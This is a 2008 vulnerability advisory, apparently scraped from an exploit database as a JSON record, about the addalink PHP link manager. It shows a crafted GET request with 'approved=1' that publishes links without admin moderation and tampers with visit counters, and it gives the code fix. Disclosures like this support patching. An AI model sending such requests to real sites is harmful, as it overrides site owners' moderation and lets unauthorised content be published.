Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-3685", "type": "zdt", "bulletinFamily": "exploit", "title": "addalink <= 4 Write Approved Links Remote Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2008-09-17T00:00:00", "modified": "2008-09-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/3685", "reporter": "Pepelux", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-03T13:16:48", "viewCount": 11, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/3685", "sourceData": "=======================================================\r\naddalink <= 4 Write Approved Links Remote Vulnerability\r\n=======================================================\r\n\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\naddalink <= 4 - beta / Write approved links without a previous moderation by the admin\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n$ Program: addalink\r\n$ Version: <= 4 - beta\r\n$ File affected: add_link.php\r\n$ Download: http://sourceforge.net/projects/addalink/\r\n\r\n\r\nLinklist is a mini website that you can use in your webpage. Basically it \r\nmanages a database of links using PHP+MySQL. Users can send links (url, \r\ndescription, etc.) by a form and one admin has to approve or delete the \r\nlinks before the publication in the website.\r\n\r\nOne not very important problem is that add_link.php doesn't test the \r\nmethod used (GET or POST). But the real problem is the method to insert \r\nsome values. \r\n\r\nReading the code you can see the SQL sentence:\r\n\r\nINSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email',\r\n '$counter=0','$description','$ip','$date','$category_id','0')\";\r\n\r\nIt assigns values to approved and counter directly in the SQL sentence. Because of that,\r\nyou can enter approved links without moderation by writing this:\r\n\r\nhttp://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link\r\n&approved=1&[email\u00a0protected]&description=blablablablablablabla&category_id=1\r\n\r\nAlso you can alter the counter of visits if you add &counter=XXXX to the GET request\r\n\r\n\r\n-= Solution =-\r\n\r\n\r\n$approved = 0;\r\n$counter = 0;\r\n\r\nINSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email',\r\n '$counter','$description','$ip','$date','$category_id','0')\";\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "_state": {"dependencies": 1645417471, "score": 1659766679}}